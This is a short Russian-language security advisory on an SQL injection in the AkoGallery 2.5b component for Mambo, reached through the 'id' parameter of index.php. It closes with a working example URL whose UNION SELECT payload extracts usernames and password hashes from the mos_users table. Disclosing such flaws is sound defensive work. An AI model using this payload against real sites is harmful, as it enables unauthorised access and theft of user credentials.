Программа: Mambo Component AkoGallery 2.5b
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
index.php?option=com_akogallery&Itemid=S@BUN& func=detail&id=-334455/**/union/**/select/**/null,null,concat(password,0x3a),null,null, null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(0x3a, username)/**/from/**/mos_users/*